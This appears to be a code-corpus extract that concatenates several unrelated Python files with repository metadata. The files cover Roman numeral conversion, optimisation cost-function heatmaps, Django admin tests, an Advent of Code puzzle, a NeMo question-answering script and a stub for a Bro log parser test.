async with get_client(LeafService, host=addr.ip, port=addr.port) as client:
rev = await client.reverse([1, 2, 3])
# TODO: shouldn't need the explicit list conversion
self.assertEqual([3, 2, 1], list(rev))
out = await client.echo("hello")
self.assertEqual("hello", out)
sum = await client.add(1, 2)
self.assertEqual(3, sum)
| 45.555556 | 87 | 0.647228 |
acfb520fe3b10e5d15ca06875db3f3919145d3bb | 2,785 | py | Python | dipper/utils/romanplus.py | monarch-ci/dipper | abcd4843ec051a47cef3b592fadc1cd7d1616b45 | [
"BSD-3-Clause"
] | 52 | 2015-01-28T21:22:19.000Z | 2022-03-15T09:21:07.000Z | dipper/utils/romanplus.py | monarch-ci/dipper | abcd4843ec051a47cef3b592fadc1cd7d1616b45 | [
"BSD-3-Clause"
] | 742 | 2015-01-06T00:21:30.000Z | 2021-08-02T20:57:17.000Z | dipper/utils/romanplus.py | monarch-ci/dipper | abcd4843ec051a47cef3b592fadc1cd7d1616b45 | [
"BSD-3-Clause"
] | 24 | 2015-07-28T17:06:30.000Z | 2021-08-18T21:28:53.000Z | """
Convert to and from Roman numerals
This program is part of "Dive Into Python", a free Python tutorial for
experienced programmers. Visit http://diveintopython.org/ for the
latest version.
This program is free software; you can redistribute it and/or modify
it under the terms of the Python 2.1.1 license, available at
http://www.python.org/2.1.1/license.html
Note:
This has been modified to add optional characters
after the initial roman numbers by nlw.
"""
import re
__author__ = "Mark Pilgrim (f8dy@diveintopython.org)"
__version__ = "1.4"
__date__ = "8 August 2001"
__copyright__ = "Copyright (c) 2001 Mark Pilgrim"
# Define digit's regular expression mapping
romanNumeralMap = (('M', 1000),
('CM', 900),
('D', 500),
('CD', 400),
('C', 100),
('XC', 90),
('L', 50),
('XL', 40),
('X', 10),
('IX', 9),
('V', 5),
('IV', 4),
('I', 1))
def toRoman(num):
"""convert integer to Roman numeral"""
if not 0 < num < 5000:
raise ValueError("number %n out of range (must be 1..4999)", num)
if int(num) != num:
raise TypeError("decimals %n can not be converted", num)
result = ""
for numeral, integer in romanNumeralMap:
while num >= integer:
result += numeral
num -= integer
return result
# Define pattern to detect valid Roman numerals
romanNumeralPattern = re.compile("""
^ # beginning of string
M{0,4} # thousands - 0 to 4 M's
(CM|CD|D?C{0,3}) # hundreds - 900 (CM), 400 (CD), 0-300 (0 to 3 C's),
# or 500-800 (D, followed by 0 to 3 C's)
(XC|XL|L?X{0,3}) # tens - 90 (XC), 40 (XL), 0-30 (0 to 3 X's),
# or 50-80 (L, followed by 0 to 3 X's)
(IX|IV|V?I{0,3}) # ones - 9 (IX), 4 (IV), 0-3 (0 to 3 I's),
# or 5-8 (V, followed by 0 to 3 I's)
[A-Z] # optional suffix letter,
# but don't retain.
# differs from original roman.py
$ # end of string
""", re.VERBOSE)
def fromRoman(strng):
"""convert Roman numeral to integer"""
if not strng:
raise TypeError('Input can not be blank')
if not romanNumeralPattern.search(strng):
raise ValueError('Invalid Roman numeral: %s', strng)
result = 0
index = 0
for numeral, integer in romanNumeralMap:
while strng[index:index+len(numeral)] == numeral:
result += integer
index += len(numeral)
return result
| 33.154762 | 76 | 0.521724 |
acfb52c4c6c61e2388b978c549354c91b695aeab | 15,572 | py | Python | py/2DSlice.py | StevenGuo42/vtk_paraview_visualization | 8bb10db6b2f0bede85b5770f3c956b980cc36557 | [
"Apache-2.0"
] | null | null | null | py/2DSlice.py | StevenGuo42/vtk_paraview_visualization | 8bb10db6b2f0bede85b5770f3c956b980cc36557 | [
"Apache-2.0"
] | null | null | null | py/2DSlice.py | StevenGuo42/vtk_paraview_visualization | 8bb10db6b2f0bede85b5770f3c956b980cc36557 | [
"Apache-2.0"
] | null | null | null | ########################################################
##
## Test for high-dimensional visualization
## COSC 3307 WI 2021
##
## NIST cost functions: MGH17, ENSO, Rat43
## Other cost functions: Styblinski-Tang, Rastrigin, Sphere,
## Rosenbrock, Qing, Michalewicz, Salomon, Deb3
##
## See (e.g. for MGH17):
## https://www.itl.nist.gov/div898/strd/nls/data/mgh17.shtml
## https://www.itl.nist.gov/div898/strd/nls/data/LINKS/DATA/MGH17.dat
## https://www.itl.nist.gov/div898/strd/nls/data/LINKS/v-mgh17.shtml
## https://www.itl.nist.gov/div898/strd/nls/data/LINKS/s-mgh17.shtml
##
## For other NIST functions, see:
## https://www.itl.nist.gov/div898/strd/nls/nls_main.shtml
##
## Dr. M. Wachowiak
## 4/28/21 -- 5/1/21
##
##
########################################################
import numpy as np
## For TSNE....
from sklearn.manifold import TSNE
## For interpolation....
from scipy.interpolate import griddata
## For plotting....
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
## For Plotly graphics....
import plotly.graph_objects as go
############################################
##
## Cost functions....
##
############################################
##########################################
## Styblinski-Tang
##########################################
def StybTang(x):
d = len(x)
s = sum(x**4 - 16*x**2 + 5*x) / 2.0
return(s)
##########################################
## Qing
##########################################
def Qing(x):
d = len(x)
s = sum((x**2 - (np.arange(0, d)+1)) ** 2)
return(s)
##########################################
## Rosenbrock
##########################################
def Rosenbrock(x):
d = len(x)
s = 0.0
for i in range(0, d-1):
t0 = (x[i+1] - (x[i])**2)**2
t1 = (1.0 - x[i])**2
s += (100.0*t0 + t1)
return(s)
##########################################
## Sphere
##########################################
def Sphere(x):
## d = len(x)
s = sum(x**2)
return(s)
##########################################
## Michalewicz
##########################################
def Michalewicz(x):
d = len(x)
m = 10
s = (np.sin((np.linspace(1, d, num = d) * (x**2)) / np.pi)) ** (2*m)
s = s * np.sin(x)
s = -sum(s)
return(s)
##########################################
## Rastrigin
##########################################
def Rastrigin(x):
d = len(x)
A = 10
s = 0.0
for i in range(0, d):
s += ((x[i])**2 - A*np.cos(2.0 * np.pi * x[i]))
s += (A * d)
return(s)
##########################################
## Salomon
##########################################
def Salomon(x):
d = len(x)
s0 = np.sqrt(sum(x ** 2))
s = 1.0 - np.cos(2.0 * np.pi * s0) + (0.1 * s0)
return(s)
##########################################
## Deb3
##########################################
def Deb3(x):
d = len(x)
s = -1.0/d * sum((np.sin(5.0 * np.pi * ((x ** (3/4)) - 0.05))) ** 6)
return(s)
##########################################
## MGH17 (NIST)
##########################################
def MGH17(beta):
d = len(beta) ## 5
N = len(RESP_VARS) ## Global
s = 0.0
for i in range(0, N):
y0 = RESP_VARS[i][0]
x = RESP_VARS[i][1]
y = beta[0] + beta[1]*np.exp(-beta[3]*x) + beta[2]*np.exp(-beta[4]*x)
s += ((y0 - y)**2)/N
s = np.sqrt(s)
return(s)
##########################################
## Rat43 (NIST)
##########################################
def Rat43(beta):
d = len(beta) ## 5
N = len(RAT43_DATA) ## Global
s = 0.0
for i in range(0, N):
y0 = RAT43_DATA[i][0]
x = RAT43_DATA[i][1]
y = beta[0] / ((1.0 + np.exp(beta[1] - beta[2]*x))**(1.0/beta[3]))
##y = beta[0] + beta[1]*np.exp(-beta[3]*x) + beta[2]*np.exp(-beta[4]*x)
s += ((y0 - y)**2)/N
s = np.sqrt(s)
return(s)
##########################################
## ENSO (NIST)
##########################################
def ENSO(beta):
d = len(beta) ## 9
N = len(ENSO_DATA) ## Global
TwoPI = 2.0 * np.pi
s = 0.0
for i in range(0, N):
y0 = ENSO_DATA[i][0]
x = ENSO_DATA[i][1]
y = beta[0] + beta[1]*np.cos(TwoPI * x / 12.0) + beta[2]*np.sin(TwoPI * x / 12.0) + beta[4]*np.cos(TwoPI * x / beta[3]) + beta[5]*np.sin(TwoPI * x / beta[3]) + beta[7]*np.cos(TwoPI * x / beta[6]) + beta[8]*np.sin(TwoPI * x / beta[6])
##y = beta[0] + beta[1]*np.exp(-beta[3]*x) + beta[2]*np.exp(-beta[4]*x)
s += ((y0 - y)**2)/N
s = np.sqrt(s)
return(s)
###################################################################
##
## Get a slice from the volume....
##
###################################################################
def getVolumeSlice(plane, islice, X, Xinterp, gx, gy, gz):
Ngrid = len(gx)
## This can be made more general....
if (plane == 0):
vslice = gx[islice]
elif (plane == 1):
vslice = gy[islice]
else:
vslice = gz[islice]
indx = np.where(X[:, plane] == vslice)
## This needs to be cleaned up....
Z = Xinterp[indx]
## Reshape into an image....
Z = np.reshape(Z, ((Ngrid, Ngrid)))
return(Z)
#####################################################
##
## Get a 2D slice directly from the points....
##
#####################################################
def getPointCloudSlice(plane, BETA, rmse, Ngrid):
## Assume that 'plane' is 1 x 2.
B = BETA[:, plane]
xmin, xmax = np.min(B[:,0]), np.max(B[:, 0])
ymin, ymax = np.min(B[:,1]), np.max(B[:, 1])
gx, gy = np.meshgrid(np.linspace(xmin, xmax, num = Ngrid),
np.linspace(ymin, ymax, num = Ngrid))
Z = griddata(B, rmse, (gx, gy), method = 'linear')
return(Z)
#####################################################
##
## Evaluate the grid directly....
##
#####################################################
def getFunctionSlice(f, v, Ngridx, Ngridy, LB, UB):
## First NaN is x, second NaN is y....
indx = np.where(np.isnan(v))
indx = indx[0]
Z = np.zeros((Ngridy, Ngridx))
gx = np.linspace(LB[indx[0]], UB[indx[0]], num = Ngridx)
gy = np.linspace(LB[indx[1]], UB[indx[1]], num = Ngridy)
x = np.copy(v)
for j in range(0, Ngridy):
for i in range(0, Ngridx):
x[indx[0]] = gx[i]
x[indx[1]] = gy[j]
Z[i][j] = f(x)
return(Z, gx, gy)
###################################################################
##
## Begin program....
##
###################################################################
###################################################
## MGH17 data
## See https://www.itl.nist.gov/div898/strd/nls/data/LINKS/s-mgh17.shtml
###################################################
RESP_VARS = np.array([
[8.440000E-01, 0.000000E+00],
[9.080000E-01, 1.000000E+01],
[9.320000E-01, 2.000000E+01],
[9.360000E-01, 3.000000E+01],
[9.250000E-01, 4.000000E+01],
[9.080000E-01, 5.000000E+01],
[8.810000E-01, 6.000000E+01],
[8.500000E-01, 7.000000E+01],
[8.180000E-01, 8.000000E+01],
[7.840000E-01, 9.000000E+01],
[7.510000E-01, 1.000000E+02],
[7.180000E-01, 1.100000E+02],
[6.850000E-01, 1.200000E+02],
[6.580000E-01, 1.300000E+02],
[6.280000E-01, 1.400000E+02],
[6.030000E-01, 1.500000E+02],
[5.800000E-01, 1.600000E+02],
[5.580000E-01, 1.700000E+02],
[5.380000E-01, 1.800000E+02],
[5.220000E-01, 1.900000E+02],
[5.060000E-01, 2.000000E+02],
[4.900000E-01, 2.100000E+02],
[4.780000E-01, 2.200000E+02],
[4.670000E-01, 2.300000E+02],
[4.570000E-01, 2.400000E+02],
[4.480000E-01, 2.500000E+02],
[4.380000E-01, 2.600000E+02],
[4.310000E-01, 2.700000E+02],
[4.240000E-01, 2.800000E+02],
[4.200000E-01, 2.900000E+02],
[4.140000E-01, 3.000000E+02],
[4.110000E-01, 3.100000E+02],
[4.060000E-01, 3.200000E+02]
])
###################################################
## RAT43 data
###################################################
RAT43_DATA = np.array([[16.08E0, 1.0E0],
[33.83E0, 2.0E0],
[65.80E0, 3.0E0],
[97.20E0, 4.0E0],
[191.55E0, 5.0E0],
[326.20E0, 6.0E0],
[386.87E0, 7.0E0],
[520.53E0, 8.0E0],
[590.03E0, 9.0E0],
[651.92E0, 10.0E0],
[724.93E0, 11.0E0],
[699.56E0, 12.0E0],
[689.96E0, 13.0E0],
[637.56E0, 14.0E0],
[717.41E0, 15.0E0]
])
###################################################
## ENSO data
###################################################
ENSO_DATA = np.array([[12.9,1],
[11.3,2],
[10.6,3],
[11.2,4],
[10.9,5],
[7.5,6],
[7.7,7],
[11.7,8],
[12.9,9],
[14.3,10],
[10.9,11],
[13.7,12],
[17.1,13],
[14,14],
[15.3,15],
[8.5,16],
[5.7,17],
[5.5,18],
[7.6,19],
[8.6,20],
[7.3,21],
[7.6,22],
[12.7,23],
[11,24],
[12.7,25],
[12.9,26],
[13,27],
[10.9,28],
[10.4,29],
[10.2,30],
[8,31],
[10.9,32],
[13.6,33],
[10.5,34],
[9.2,35],
[12.4,36],
[12.7,37],
[13.3,38],
[10.1,39],
[7.8,40],
[4.8,41],
[3,42],
[2.5,43],
[6.3,44],
[9.7,45],
[11.6,46],
[8.6,47],
[12.4,48],
[10.5,49],
[13.3,50],
[10.4,51],
[8.1,52],
[3.7,53],
[10.7,54],
[5.1,55],
[10.4,56],
[10.9,57],
[11.7,58],
[11.4,59],
[13.7,60],
[14.1,61],
[14,62],
[12.5,63],
[6.3,64],
[9.6,65],
[11.7,66],
[5,67],
[10.8,68],
[12.7,69],
[10.8,70],
[11.8,71],
[12.6,72],
[15.7,73],
[12.6,74],
[14.8,75],
[7.8,76],
[7.1,77],
[11.2,78],
[8.1,79],
[6.4,80],
[5.2,81],
[12,82],
[10.2,83],
[12.7,84],
[10.2,85],
[14.7,86],
[12.2,87],
[7.1,88],
[5.7,89],
[6.7,90],
[3.9,91],
[8.5,92],
[8.3,93],
[10.8,94],
[16.7,95],
[12.6,96],
[12.5,97],
[12.5,98],
[9.8,99],
[7.2,100],
[4.1,101],
[10.6,102],
[10.1,103],
[10.1,104],
[11.9,105],
[13.6,106],
[16.3,107],
[17.6,108],
[15.5,109],
[16,110],
[15.2,111],
[11.2,112],
[14.3,113],
[14.5,114],
[8.5,115],
[12,116],
[12.7,117],
[11.3,118],
[14.5,119],
[15.1,120],
[10.4,121],
[11.5,122],
[13.4,123],
[7.5,124],
[0.6,125],
[0.3,126],
[5.5,127],
[5,128],
[4.6,129],
[8.2,130],
[9.9,131],
[9.2,132],
[12.5,133],
[10.9,134],
[9.9,135],
[8.9,136],
[7.6,137],
[9.5,138],
[8.4,139],
[10.7,140],
[13.6,141],
[13.7,142],
[13.7,143],
[16.5,144],
[16.8,145],
[17.1,146],
[15.4,147],
[9.5,148],
[6.1,149],
[10.1,150],
[9.3,151],
[5.3,152],
[11.2,153],
[16.6,154],
[15.6,155],
[12,156],
[11.5,157],
[8.6,158],
[13.8,159],
[8.7,160],
[8.6,161],
[8.6,162],
[8.7,163],
[12.8,164],
[13.2,165],
[14,166],
[13.4,167],
[14.8,168]])
## Default bounds....
LB = np.array([-10, -10, -10, -10, -10, -10, -10])
UB = np.array([10, 10, 10, 10, 10, 10, 10])
################################################################
##
## Certified values and bounds for the NIST functions....
##
################################################################
cert_MGH17 = np.array([3.7541005211E-01,1.9358469127E+00,
-1.4646871366E+00,1.2867534640E-02,
2.2122699662E-02])
cert_Rat43 = np.array([6.9964151270E+02,5.2771253025E+00,7.5962938329E-01,1.2792483859E+00])
cert_ENSO = np.array([1.0510749193E+01,3.0762128085E+00,5.3280138227E-01,4.4311088700E+01,-1.6231428586E+00,5.2554493756E-01,2.6887614440E+01,2.1232288488E-01,1.4966870418E+00])
LB_ENSO = np.array([0.,0.,0.,20.,-3.,-5.,5.,-1.,0.])
UB_ENSO = np.array([20.,10.,2.,80.,0.05,5,40.,2.,5.])
LB_MGH17 = np.array([0, 0, -100, 0, 0, 0])
UB_MGH17 = np.array([50, 150, -0.1, 10, 2])
LB_Rat43 = np.array([100, 0, 0, 0])
UB_Rat43 = np.array([900, 10, 2, 5])
##########################################################################
##
## Sample graphics session....
##
## NOTE: The Z matrix (the 2D function evaluation values)
## can be displayed as they are (Plotly will adjust the mapping)
## or they can be transformed to assist visualizing subtle features.
##
## E.g. if all the values are > 0, then np.log(Z) can be displayed, as
## can np.sqrt(Z), or even Z**(1/4).
## Alternately, Z can be scaled to [0, 1] and subsequently transformed.
## E.g. Z1 = (Z - np.min(Z)) / (np.max(Z) - np.min(Z)).
## Then, Z1 can be transformed; e.g. np.sqrt(Z1) or Z1 ** (1/4).
##
##########################################################################
###################################
## Example 1 -- ENSO
###################################
v = np.copy(cert_ENSO)
v[[0, 3]] = np.nan ## Grid is on dimensions 0 and 3....
LB = np.copy(LB_ENSO)
UB = np.copy(UB_ENSO)
## Number of points (pixels) on the grid....
Ngridx = 140
Ngridy = 140
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(ENSO, v, Ngridx, Ngridy, LB, UB)
## Plot with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = Z))
fig.show()
## Plot the transformed output with Plotly....
## NOTE: RMSE > 0 (the data do not fit the model perfectly to obtain RMSE = 0).
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = np.log(Z)))
fig.show()
###################################
## Example 2 -- Michalewicz
###################################
## Search space ranges from 0 to Pi.
D = 10
LB = np.zeros(D)
UB = np.zeros(D) + np.pi
v = np.random.rand(D) * np.pi
v[[4, 8]] = np.nan ## Grid is on dimensions 4 and 8....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Michalewicz, v, Ngridx, Ngridy, LB, UB)
## Plot with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = Z))
fig.show()
###################################
## Example 3 -- Deb3
###################################
## Search space ranges from 0 to 1.
D = 8
LB = np.zeros(D)
UB = np.zeros(D) + 1
v = np.random.rand(D)
v[[1, 7]] = np.nan ## Grid is on dimensions 1 and 7....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Deb3, v, Ngridx, Ngridy, LB, UB)
## Plot with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = Z))
fig.show()
###################################
## Example 4 -- Rosenbrock
###################################
## Search space ranges from -5 to 5.
D = 8
LB = np.zeros(D) - 5
UB = np.zeros(D) + 5
v = np.zeros(D) + 1
v[[2, 6]] = np.nan ## Grid is on dimensions 2 and 6....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Rosenbrock, v, Ngridx, Ngridy, LB, UB)
## Plot the transformed cost function with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = np.log(Z)))
fig.show()
###################################
## Example 5 -- Salomon
###################################
## Search space ranges from -100 to 100.
D = 12
LB = np.zeros(D) - 100
UB = np.zeros(D) + 100
v = np.random.rand(D) * 200 - 100
v[[3, 9]] = np.nan ## Grid is on dimensions 3 and 9....
## Number of points (pixels) on the grid....
Ngridx = 200
Ngridy = 200
## Compute the 2D slice....
Z, gx, gy = getFunctionSlice(Salomon, v, Ngridx, Ngridy, LB, UB)
## Plot the transformed cost function with Plotly....
fig = go.Figure(data =
go.Heatmap(x = gx, y = gy, z = np.log(Z)))
fig.show()
| 21.331507 | 241 | 0.439571 |
acfb52d6aeeea4f10cbb0c326aaf70f03e91f45d | 1,099 | py | Python | hc/api/tests/test_admin.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | hc/api/tests/test_admin.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | 1 | 2021-06-10T23:14:00.000Z | 2021-06-10T23:14:00.000Z | hc/api/tests/test_admin.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | from hc.api.models import Channel, Check
from hc.test import BaseTestCase
class ApiAdminTestCase(BaseTestCase):
def setUp(self):
super(ApiAdminTestCase, self).setUp()
self.check = Check.objects.create(project=self.project, tags="foo bar")
self.alice.is_staff = True
self.alice.is_superuser = True
self.alice.save()
def test_it_shows_channel_list_with_pushbullet(self):
self.client.login(username="alice@example.org", password="password")
Channel.objects.create(project=self.project, kind="pushbullet",
value="test-token")
r = self.client.get("/admin/api/channel/")
self.assertContains(r, "Pushbullet")
def test_it_shows_channel_list_with_unverified_email(self):
self.client.login(username="alice@example.org", password="password")
Channel.objects.create(project=self.project, kind="email",
value="foo@example.org")
r = self.client.get("/admin/api/channel/")
self.assertContains(r, "Email <i>(unconfirmed)</i>")
| 34.34375 | 79 | 0.652411 |
acfb52e0e74ebdf8389e7f9ab1eee1ddfa6455c3 | 1,648 | py | Python | AdventofCode_2021/day8.py | jacagi/freetime | 67dd1cd46489ada554e7c34559826812e5a55916 | [
"MIT"
] | 1 | 2021-12-08T19:01:56.000Z | 2021-12-08T19:01:56.000Z | AdventofCode_2021/day8.py | jacagi/freetime | 67dd1cd46489ada554e7c34559826812e5a55916 | [
"MIT"
] | null | null | null | AdventofCode_2021/day8.py | jacagi/freetime | 67dd1cd46489ada554e7c34559826812e5a55916 | [
"MIT"
] | null | null | null | import itertools
check_1478 = lambda x: 1 if len(x) in [2,3,4,7] else 0
split_signals = lambda x: x.split(" | ")[1].split(" ")
file = open("input8.txt", "r").read().splitlines()
def calculate_result(line):
complete_line = line.split(" | ")
codes = sorted(complete_line[0].split(" "), key=len)
result = complete_line[1].split(" ")
numbers = {}
numbers[8] = 'abcdefg'
numbers[1] = "".join(sorted(codes.pop(0)))
numbers[7] = "".join(sorted(codes.pop(0)))
numbers[4] = "".join(sorted(codes.pop(0)))
for code in codes:
if len(code) == 5:
if len(list(set(code)&set(numbers[1]))) == 2:
numbers[3] = "".join(sorted(code))
elif len(list(set(code)&set(numbers[4]))) == 3:
numbers[5] = "".join(sorted(code))
else:
numbers[2] = "".join(sorted(code))
elif len(code) == 6:
if len(list(set(code)&set(numbers[1]))) == 1:
numbers[6] = "".join(sorted(code))
elif len(list(set(code)&set(numbers[4]))) == 4:
numbers[9] = "".join(sorted(code))
else:
numbers[0] = "".join(sorted(code))
coderesult = []
for r in result:
coderesult.append(list(numbers.keys())[list(numbers.values()).index("".join(sorted(r)))])
return coderesult[0]*1000 + coderesult[1]*100 + coderesult[2]*10 + coderesult[3]
print("-*-*-*-*-*-*-*-*-*-*-*-")
print("Day 8 Part 1: " + str(sum(map(check_1478, list(itertools.chain(*list(map(split_signals,file))))))))
print("Day 8 Part 2: " + str(sum(map(calculate_result, file))))
print("-*-*-*-*-*-*-*-*-*-*-*-") | 41.2 | 106 | 0.538835 |
acfb5456dabf5e0bdf1d679bdb0b210575124acb | 294 | py | Python | 110_extract_signatures-vanilla.py | stefanthaler/2017-fnlm-experiments-supervised | 813fd941900c6f3bd0943ec9856258421f71fcb6 | [
"Apache-2.0"
] | 4 | 2017-10-12T04:40:33.000Z | 2022-01-28T09:32:47.000Z | 110_extract_signatures-vanilla.py | stefanthaler/2017-fnlm-experiments-supervised | 813fd941900c6f3bd0943ec9856258421f71fcb6 | [
"Apache-2.0"
] | 1 | 2017-12-27T06:07:02.000Z | 2018-01-23T15:37:58.000Z | 110_extract_signatures-vanilla.py | stefanthaler/2017-fnlm-experiments-supervised | 813fd941900c6f3bd0943ec9856258421f71fcb6 | [
"Apache-2.0"
] | 2 | 2017-11-22T09:19:06.000Z | 2020-02-29T15:36:21.000Z | # -*- coding: utf-8 -*-
from c110.hyperparameters import *
variable_char = "º"
from approaches.signatures import extract_signatures_vanilla
extract_signatures_vanilla(test_logsfile_name,result_tags_filename,assigned_signatures_filename,found_signatures_filename,combined_signatures_filename)
| 42 | 151 | 0.863946 |
acfb54995e19b90bc6dbb9e385f84b21230cb799 | 164 | py | Python | Implementations/drygasconv1_python3/drysponge/drygascon128_aead.py | sebastien-riou/DryGASCON | 406b51914b4e8df752769feac48643c0fd1bd74b | [
"BSD-3-Clause"
] | 2 | 2019-11-11T08:12:16.000Z | 2021-04-13T07:00:53.000Z | Implementations/drygasconv1_python3/drysponge/drygascon128_aead.py | sebastien-riou/DryGASCON | 406b51914b4e8df752769feac48643c0fd1bd74b | [
"BSD-3-Clause"
] | null | null | null | Implementations/drygasconv1_python3/drysponge/drygascon128_aead.py | sebastien-riou/DryGASCON | 406b51914b4e8df752769feac48643c0fd1bd74b | [
"BSD-3-Clause"
] | 1 | 2019-08-10T13:26:11.000Z | 2019-08-10T13:26:11.000Z | from drysponge.drygascon import DryGascon
from drysponge.aead import aead
if __name__ == "__main__":
impl = DryGascon.DryGascon128().instance()
aead(impl)
| 23.428571 | 46 | 0.75 |
acfb5553927e7d1828dd295db9cb6590e20120f7 | 5,770 | py | Python | examples/nlp/question_answering/question_answering_squad.py | vadam5/NeMo | 3c5db09539293c3c19a6bb7437011f91261119af | [
"Apache-2.0"
] | 1 | 2021-04-13T20:34:16.000Z | 2021-04-13T20:34:16.000Z | examples/nlp/question_answering/question_answering_squad.py | vadam5/NeMo | 3c5db09539293c3c19a6bb7437011f91261119af | [
"Apache-2.0"
] | null | null | null | examples/nlp/question_answering/question_answering_squad.py | vadam5/NeMo | 3c5db09539293c3c19a6bb7437011f91261119af | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script contains an example on how to train, evaluate and perform inference with the question answering model.
The QAModel in NeMo supports extractive question answering problems for data in the SQuAD (https://rajpurkar.github.io/SQuAD-explorer/) format.
***Data format***
The QAModel requires a JSON file for each dataset split.
In the following we will show example for a training file. Each title has one or multiple paragraph entries, each consisting of the text - "context", and question-answer entries. Each question-answer entry has:
* a question
* a globally unique id
* a boolean flag "is_impossible" which shows if the question is answerable or not
* in case the question is answerable one answer entry, which contains the text span and its starting character index in the context. If not answerable, the "answers" list is empty
The evaluation file follows the above format except for it can provide more than one answers to the same question.
The inference file follows the above format except for it does not require the "answers" and "is_impossible" keywords.
***Downloading the dataset***
Run ./NeMo/examples/nlp/question_answering/get_squad.py to download the SQuAD dataset:
# python get_squad.py --destDir=<PATH_TO_DATA>
***Setting the configs***
The model and the PT trainer are defined in a config file which declares multiple important sections.
The most important ones are:
model: All arguments that are related to the Model - language model, tokenizer, token classifier, optimizer,
schedulers, and datasets/data loaders.
trainer: Any argument to be passed to PyTorch Lightning including number of epochs, number of GPUs,
precision level, etc.
This script uses the `/examples/nlp/question_answering/conf/question_answering_squad_config.yaml` config file
by default. You may update the config file from the file directly. The other option is to set another config file via command line arguments by `--config-name=CONFIG_FILE_PATH'.
***Model Training***
# python question_answering_squad.py
model.train_ds.file=<TRAIN_JSON_FILE>
model.validation_ds=<VAL_JSON_FILE>
trainer.max_epochs=<NUM_EPOCHS>
trainer.gpus=[<CHANGE_TO_GPU_YOU_WANT_TO_USE>]
***Model Evaluation***
Set `do_training=False` in the script and run:
# python question_answering_squad.py
model.test_file=<TEST_JSON_FILE>
To load a pretrained checkpoint from cloud prior to training (e.g. for fine-tuning) or evaluation you can set cfg.from_pretrained=<MODEL_NAME>,
e.g. MODEL_NAME='BERTBaseUncasedSQuADv1.1'. You can find all pretrained model names by using
QAModel.list_available_models(). To load a local checkpoint use qa_model.restore_from(<PATH_TO_CHECKPOINT>)
***Model Inference***
For inference use
qa_model.inference(
file=<INFERENCE_JSON_FILE>,
batch_size=<BATCH_SIZE>,
output_nbest_file=<OPTIONAL_OUTPUT_FILE_FOR_NBEST_LIST>,
output_prediction_file=<OPTIONAL_OUTPUT_FILE_FOR_PREDICTION>
)
More details on how to use this script can be found in
./NeMo/tutorials/nlp/Question_Answering_Squad.ipynb
"""
import os
import pytorch_lightning as pl
from omegaconf import DictConfig, OmegaConf
from nemo.collections.nlp.models.question_answering.qa_model import QAModel
from nemo.core.config import hydra_runner
from nemo.utils import logging
from nemo.utils.exp_manager import exp_manager
@hydra_runner(config_path="conf", config_name="question_answering_squad_config")
def main(cfg: DictConfig) -> None:
logging.info(f'Config: {cfg.pretty()}')
trainer = pl.Trainer(**cfg.trainer)
exp_dir = exp_manager(trainer, cfg.get("exp_manager", None))
if not cfg.pretrained_model:
logging.info(f'Config: {OmegaConf.to_yaml(cfg)}')
model = QAModel(cfg.model, trainer=trainer)
else:
logging.info(f'Loading pretrained model {cfg.pretrained_model}')
model = QAModel.from_pretrained(cfg.pretrained_model)
if cfg.do_training:
model.setup_training_data(train_data_config=cfg.model.train_ds)
model.setup_validation_data(val_data_config=cfg.model.validation_ds)
if cfg.do_training:
trainer.fit(model)
if cfg.model.nemo_path:
model.save_to(cfg.model.nemo_path)
if hasattr(cfg.model, 'test_ds') and cfg.model.test_ds.file is not None:
trainer.test(model)
# change to path if you want results to be written to file e.g. os.path.join(exp_dir, "output_nbest_file.txt")
output_nbest_file = None
# change to path if you want results to be written to file e.g. os.path.join(exp_dir, "output_prediction_file.txt")
output_prediction_file = None
inference_samples = 5 # for test purposes. To use entire inference dataset set to -1
all_preds, all_nbests = model.inference(
file=cfg.model.validation_ds.file,
batch_size=1,
num_samples=inference_samples,
output_nbest_file=output_nbest_file,
output_prediction_file=output_prediction_file,
)
for _, item in all_preds.items():
print(f"question: {item[0]} answer: {item[1]}")
if __name__ == '__main__':
main()
| 42.740741 | 210 | 0.752686 |
acfb570294f296e674721ddfa712c945e190ea5e | 4,173 | py | Python | python/parserDev/test_BroHttpPyParser.py | jzadeh/aktaion | 485488908e88212e615cd8bde04c6b1b63403cd0 | [
"Apache-2.0"
] | 112 | 2017-07-26T00:30:29.000Z | 2021-11-09T14:02:12.000Z | python/parserDev/test_BroHttpPyParser.py | jzadeh/aktaion | 485488908e88212e615cd8bde04c6b1b63403cd0 | [
"Apache-2.0"
] | null | null | null | python/parserDev/test_BroHttpPyParser.py | jzadeh/aktaion | 485488908e88212e615cd8bde04c6b1b63403cd0 | [
"Apache-2.0"
] | 38 | 2017-07-28T03:09:01.000Z | 2021-05-07T03:21:32.000Z | import BroHttpPyParser
import ParsingNormalizationPyLogic
import unittest
import os
import inspect
#the scala test unit defines the following tests:
#1)Basic Bro Normalized Parser
#intakes a raw log line
#parser the raw log line through BroHttpParser
#Feed the parsed line through normalizedBroLog
#checks host, id_orig_host, and sourceIP attributes
#2)Basic Bro HTTP parser
#intake a raw log line
#checks host, id_orig_host, and sourceIP attributes
#3)Bro HTTP file
